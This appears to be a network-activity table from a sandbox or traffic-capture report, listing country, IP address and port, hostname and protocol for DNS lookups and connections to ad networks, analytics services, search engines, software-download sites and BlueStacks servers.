| US | 34.98.64.218:443 | connatix-d.openx.net | udp |
| DE | 141.95.98.64:443 | diagnostics.id5-sync.com | tcp |
| NL | 185.89.210.20:443 | secure.adnxs.com | tcp |
| GB | 18.245.218.86:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.245.218.86:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.245.218.86:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.245.218.86:443 | ts.amazon-adsystem.com | tcp |
| GB | 18.245.218.86:443 | ts.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 2.19.252.134:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | 134.252.19.2.in-addr.arpa | udp |
| NL | 185.89.210.20:443 | secure.adnxs.com | tcp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| US | 8.8.8.8:53 | apien.ldmnq.com | udp |
| GB | 13.224.132.104:443 | apien.ldmnq.com | tcp |
| US | 8.8.8.8:53 | 104.132.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| US | 178.128.135.204:443 | brightcombid.marphezis.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | udp |
| IE | 52.211.208.99:443 | ad.360yield.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| GB | 216.58.213.14:80 | www.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 99.208.211.52.in-addr.arpa | udp |
| NL | 185.89.210.20:443 | secure.adnxs.com | tcp |
| NL | 185.89.210.20:443 | secure.adnxs.com | tcp |
| US | 8.8.8.8:53 | ox-rtb-europe-west2.openx.net | udp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | udp |
| GB | 216.58.212.194:443 | googleads.g.doubleclick.net | udp |
| NL | 185.89.210.20:443 | secure.adnxs.com | tcp |
| US | 8.8.8.8:53 | s2.paa-reporting-advertising.amazon | udp |
| DE | 46.4.139.58:443 | shb.richaudience.com | tcp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| US | 8.8.8.8:53 | brightcombid.marphezis.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| US | 178.128.135.204:443 | brightcombid.marphezis.com | tcp |
| IE | 52.214.18.255:443 | ad.360yield.com | tcp |
| IE | 63.33.54.152:443 | ap.lijit.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | udp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | 255.18.214.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.54.33.63.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | csm.nl3.eu.criteo.net | udp |
| NL | 23.62.61.194:443 | th.bing.com | tcp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| NL | 178.250.1.25:443 | csm.nl3.eu.criteo.net | tcp |
| US | 13.107.21.237:443 | bat.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.194:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 89.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | smartgaga.me | udp |
| US | 172.67.196.144:443 | smartgaga.me | tcp |
| US | 172.67.196.144:443 | smartgaga.me | tcp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | 144.196.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.smartgaga.me | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| FR | 35.181.89.222:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | 222.89.181.35.in-addr.arpa | udp |
| GB | 216.58.212.194:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 2.19.252.134:443 | aefd.nelreports.net | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ams3-ib.adnxs.com | udp |
| US | 8.8.8.8:53 | adsdk.microsoft.com | udp |
| US | 8.8.8.8:53 | cdn.adnxs.com | udp |
| US | 13.107.246.64:443 | adsdk.microsoft.com | tcp |
| NL | 185.89.211.116:443 | ams3-ib.adnxs.com | tcp |
| GB | 2.21.188.221:443 | cdn.adnxs.com | tcp |
| US | 8.8.8.8:53 | 116.211.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.188.21.2.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 172.217.16.238:443 | syndicatedsearch.goog | tcp |
| GB | 142.250.178.2:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| GB | 172.217.16.238:443 | syndicatedsearch.goog | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 22.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| GB | 142.250.179.238:443 | cse.google.com | tcp |
| GB | 142.250.179.238:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | clients1.google.com | udp |
| GB | 142.250.187.238:443 | clients1.google.com | tcp |
| US | 104.18.10.207:443 | maxcdn.bootstrapcdn.com | tcp |
| NL | 185.89.211.116:443 | ams3-ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | ia902903.us.archive.org | udp |
| US | 207.241.233.43:443 | ia902903.us.archive.org | tcp |
| US | 8.8.8.8:53 | 43.233.241.207.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 163.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | filecr.com | udp |
| US | 172.67.190.231:443 | filecr.com | tcp |
| US | 172.67.190.231:443 | filecr.com | tcp |
| US | 8.8.8.8:53 | 231.190.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | webcrx.io | udp |
| US | 172.67.148.101:443 | webcrx.io | tcp |
| US | 8.8.8.8:53 | zintrack.com | udp |
| US | 104.21.94.97:443 | zintrack.com | tcp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 104.21.94.97:443 | zintrack.com | tcp |
| US | 8.8.8.8:53 | 97.94.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.148.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 2.19.252.134:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | stackoverflow.com | udp |
| US | 172.64.155.249:443 | stackoverflow.com | tcp |
| US | 172.64.155.249:443 | stackoverflow.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | cdn.sstatic.net | udp |
| US | 172.64.147.34:443 | cdn.sstatic.net | tcp |
| US | 172.64.147.34:443 | cdn.sstatic.net | tcp |
| US | 172.64.147.34:443 | cdn.sstatic.net | tcp |
| US | 172.64.147.34:443 | cdn.sstatic.net | tcp |
| US | 172.64.147.34:443 | cdn.sstatic.net | tcp |
| GB | 172.217.169.74:443 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | 249.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.147.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | graph.facebook.com | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | i.sstatic.net | udp |
| GB | 163.70.151.23:443 | graph.facebook.com | tcp |
| US | 104.18.41.33:443 | i.sstatic.net | tcp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | pub.doubleverify.com | udp |
| US | 8.8.8.8:53 | scontent-lhr6-2.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| GB | 163.70.151.21:443 | scontent-lhr6-2.xx.fbcdn.net | tcp |
| US | 104.18.166.224:443 | pub.doubleverify.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 104.18.166.224:443 | pub.doubleverify.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 23.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.41.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e4b365b2ef49c4c77038f5089cd8dbff.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | stackoverflow-privacy.my.onetrust.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| GB | 172.217.169.65:443 | e4b365b2ef49c4c77038f5089cd8dbff.safeframe.googlesyndication.com | tcp |
| US | 104.18.32.137:443 | stackoverflow-privacy.my.onetrust.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | clc.stackoverflow.com | udp |
| US | 8.8.8.8:53 | support.bluestacks.com | udp |
| US | 104.16.53.111:443 | support.bluestacks.com | tcp |
| US | 104.16.53.111:443 | support.bluestacks.com | tcp |
| US | 8.8.8.8:53 | static.zdassets.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | udp |
| US | 172.67.142.245:443 | use.fontawesome.com | tcp |
| US | 104.18.72.113:443 | static.zdassets.com | tcp |
| US | 172.67.142.245:443 | use.fontawesome.com | tcp |
| US | 8.8.8.8:53 | cloud.bluestacks.com | udp |
| US | 104.16.53.111:443 | support.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 111.53.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.142.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.86.160.34.in-addr.arpa | udp |
| BE | 64.233.167.156:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | widget.kommunicate.io | udp |
| US | 8.8.8.8:53 | bluestacks-zendesk-com.disqus.com | udp |
| US | 8.8.8.8:53 | ekr.zdassets.com | udp |
| US | 199.232.192.134:443 | bluestacks-zendesk-com.disqus.com | tcp |
| GB | 108.156.39.90:443 | widget.kommunicate.io | tcp |
| US | 104.18.72.113:443 | ekr.zdassets.com | tcp |
| US | 8.8.8.8:53 | c.disquscdn.com | udp |
| US | 8.8.8.8:53 | disqus.com | udp |
| US | 151.101.192.134:443 | disqus.com | tcp |
| GB | 13.224.132.33:443 | c.disquscdn.com | tcp |
| US | 104.16.53.111:443 | support.bluestacks.com | tcp |
| US | 8.8.8.8:53 | cdn.kommunicate.io | udp |
| GB | 108.138.233.47:443 | cdn.kommunicate.io | tcp |
| US | 8.8.8.8:53 | 156.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.192.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.132.224.13.in-addr.arpa | udp |
| GB | 108.156.39.90:443 | widget.kommunicate.io | tcp |
| US | 8.8.8.8:53 | api.kommunicate.io | udp |
| US | 23.21.108.211:443 | api.kommunicate.io | tcp |
| US | 8.8.8.8:53 | chat.kommunicate.io | udp |
| US | 8.8.8.8:53 | 47.233.138.108.in-addr.arpa | udp |
| US | 3.230.9.140:443 | chat.kommunicate.io | tcp |
| US | 8.8.8.8:53 | 211.108.21.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.9.230.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ak-build.bluestacks.com | udp |
| US | 2.20.12.70:443 | ak-build.bluestacks.com | tcp |
| US | 2.20.12.70:443 | ak-build.bluestacks.com | tcp |
| SE | 192.229.221.95:80 | cacerts.rapidssl.com | tcp |
| US | 8.8.8.8:53 | cloud.bluestacks.com | udp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 8.8.8.8:53 | cdn-bgp.bluestacks.com | udp |
| US | 2.20.12.69:443 | cdn-bgp.bluestacks.com | tcp |
| US | 8.8.8.8:53 | 69.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ak-build.bluestacks.com | udp |
| US | 2.20.12.92:443 | ak-build.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| N/A | 127.0.0.1:61561 | tcp | |
| N/A | 127.0.0.1:61568 | tcp | |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| N/A | 127.0.0.1:57685 | tcp | |
| US | 8.8.8.8:53 | anygame.net | udp |
| US | 172.67.216.225:443 | anygame.net | tcp |
| US | 172.67.216.225:443 | anygame.net | tcp |
| US | 8.8.8.8:53 | 225.216.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| ES | 172.217.17.3:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | 3.17.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | wallet.now.gg | udp |
| US | 34.96.124.47:443 | wallet.now.gg | tcp |
| US | 8.8.8.8:53 | 47.124.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cloud.bluestacks.com | udp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 1.eu.dl.wireshark.org | udp |
| FI | 65.21.187.17:443 | 1.eu.dl.wireshark.org | tcp |
| FI | 65.21.187.17:443 | 1.eu.dl.wireshark.org | tcp |
| US | 8.8.8.8:53 | 17.187.21.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| US | 34.96.124.47:443 | wallet.now.gg | tcp |
| US | 34.96.124.47:443 | wallet.now.gg | tcp |
| US | 8.8.8.8:53 | fcmregistrations.googleapis.com | udp |
| GB | 216.58.201.106:443 | fcmregistrations.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 34.160.86.181:443 | cloud.bluestacks.com | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| BE | 173.194.76.188:5228 | mtalk.google.com | tcp |
| US | 8.8.8.8:53 | 188.76.194.173.in-addr.arpa | udp |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 34.96.124.47:443 | wallet.now.gg | udp |
| ES | 172.217.17.3:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| GB | 142.250.187.251:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 251.187.250.142.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | filehippo.com | udp |
| US | 35.201.106.130:443 | filehippo.com | tcp |
| US | 35.201.106.130:443 | filehippo.com | tcp |
| US | 8.8.8.8:53 | sc.filehippo.net | udp |
| US | 8.8.8.8:53 | cache-05.filehippo.net | udp |
| US | 8.8.8.8:53 | sdk.privacy-center.org | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 151.101.1.91:443 | cache-05.filehippo.net | tcp |
| US | 151.101.1.91:443 | cache-05.filehippo.net | tcp |
| US | 151.101.1.91:443 | cache-05.filehippo.net | tcp |
| US | 151.101.1.91:443 | cache-05.filehippo.net | tcp |
| US | 151.101.1.91:443 | cache-05.filehippo.net | tcp |
| US | 151.101.1.91:443 | cache-05.filehippo.net | tcp |
| US | 8.8.8.8:53 | c.aaxads.com | udp |
| GB | 13.224.222.64:443 | sdk.privacy-center.org | tcp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| US | 23.219.230.135:443 | sc.filehippo.net | tcp |
| US | 8.8.8.8:53 | cdn.firstimpression.io | udp |
| US | 8.8.8.8:53 | cdn-magiclinks.trackonomics.net | udp |
| US | 23.219.230.135:443 | sc.filehippo.net | tcp |
| US | 8.8.8.8:53 | ecdn.firstimpression.io | udp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| GB | 2.21.189.145:443 | widgets.outbrain.com | tcp |
| US | 8.8.8.8:53 | l3.aaxads.com | udp |
| US | 151.101.1.91:443 | cache-05.filehippo.net | udp |
| US | 8.8.8.8:53 | www.aaxdetect.com | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| GB | 99.86.114.24:443 | cdn-magiclinks.trackonomics.net | tcp |
| US | 23.219.237.124:443 | l3.aaxads.com | tcp |
| US | 172.67.4.231:443 | c.aaxads.com | tcp |
| GB | 18.244.179.8:443 | ecdn.firstimpression.io | tcp |
| GB | 18.244.179.8:443 | ecdn.firstimpression.io | tcp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | push-sdk.com | udp |
| US | 8.8.8.8:53 | contributor.google.com | udp |
| GB | 142.250.187.238:443 | contributor.google.com | tcp |
| DE | 178.63.248.57:443 | push-sdk.com | tcp |
| US | 23.219.237.124:443 | l3.aaxads.com | tcp |
| US | 103.224.212.213:443 | www.aaxdetect.com | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| GB | 52.84.90.106:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | tcheck.outbrainimg.com | udp |
| US | 8.8.8.8:53 | widget-pixels.outbrain.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 2.21.190.8:443 | tcheck.outbrainimg.com | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| BE | 64.233.167.156:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | api.privacy-center.org | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | uidsync.net | udp |
| US | 8.8.8.8:53 | log.outbrainimg.com | udp |
| US | 8.8.8.8:53 | 130.106.201.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.114.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.4.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.237.219.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.248.63.178.in-addr.arpa | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | 213.212.224.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.75.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.190.21.2.in-addr.arpa | udp |
| GB | 108.138.233.67:443 | api.privacy-center.org | tcp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| DE | 157.90.33.68:443 | uidsync.net | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 50.31.142.159:443 | log.outbrainimg.com | tcp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 151.101.1.91:443 | cache-05.filehippo.net | udp |
| DE | 157.90.33.68:443 | uidsync.net | tcp |
| US | 8.8.8.8:53 | mv.outbrain.com | udp |
| US | 151.101.190.132:443 | mv.outbrain.com | tcp |
| US | 8.8.8.8:53 | mcdp-chidc2.outbrain.com | udp |
| US | 64.74.236.191:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 64.74.236.191:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 8.8.8.8:53 | 67.233.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.33.90.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.142.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.190.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.236.74.64.in-addr.arpa | udp |
| GB | 18.244.140.75:443 | rock.defybrick.com | tcp |
| US | 8.8.8.8:53 | flint.defybrick.com | udp |
| US | 54.83.110.109:443 | flint.defybrick.com | tcp |
| US | 8.8.8.8:53 | 80acfb9f6ec5b0fa5c32b2c7e3290a7d.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| GB | 172.217.169.65:443 | 80acfb9f6ec5b0fa5c32b2c7e3290a7d.safeframe.googlesyndication.com | tcp |
| NL | 185.89.210.46:443 | ams3-ib.adnxs.com | tcp |
| IE | 18.200.130.123:443 | ad.360yield.com | tcp |
| US | 104.18.35.167:443 | cdn-ima.33across.com | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| DE | 18.157.230.4:443 | tlx.3lift.com | tcp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| DE | 162.19.138.118:443 | id5-sync.com | tcp |
| GB | 108.138.217.66:443 | hb.yellowblue.io | tcp |
| GB | 18.245.143.58:443 | tags.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| IE | 52.50.240.62:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | 75.140.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.110.83.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.130.200.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.151.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.217.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.230.157.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.240.50.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| GB | 142.250.187.225:443 | cdn.ampproject.org | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 35.201.106.130:443 | filehippo.com | udp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| GB | 18.244.183.122:443 | d2fl4wg0zuweex.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 122.183.244.18.in-addr.arpa | udp |
| DE | 178.63.248.57:443 | uidsync.net | tcp |
| US | 8.8.8.8:53 | 9e979812321267924c5ada7c2c3b7267.safeframe.googlesyndication.com | udp |
| DE | 157.90.33.68:443 | uidsync.net | tcp |
| DE | 157.90.33.68:443 | uidsync.net | tcp |
| US | 8.8.8.8:53 | cd.connatix.com | udp |
| US | 172.64.146.152:443 | cd.connatix.com | tcp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.146.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cds.connatix.com | udp |
| US | 50.31.142.159:443 | log.outbrainimg.com | tcp |
| US | 8.8.8.8:53 | sync.outbrain.com | udp |
| US | 50.31.142.159:443 | log.outbrainimg.com | tcp |
| US | 50.31.142.159:443 | log.outbrainimg.com | tcp |
| US | 64.74.236.31:443 | sync.outbrain.com | tcp |
| US | 8.8.8.8:53 | capi.connatix.com | udp |
| US | 8.8.8.8:53 | ins.connatix.com | udp |
| US | 8.8.8.8:53 | vid.connatix.com | udp |
| US | 8.8.8.8:53 | lit.connatix.com | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | img.connatix.com | udp |
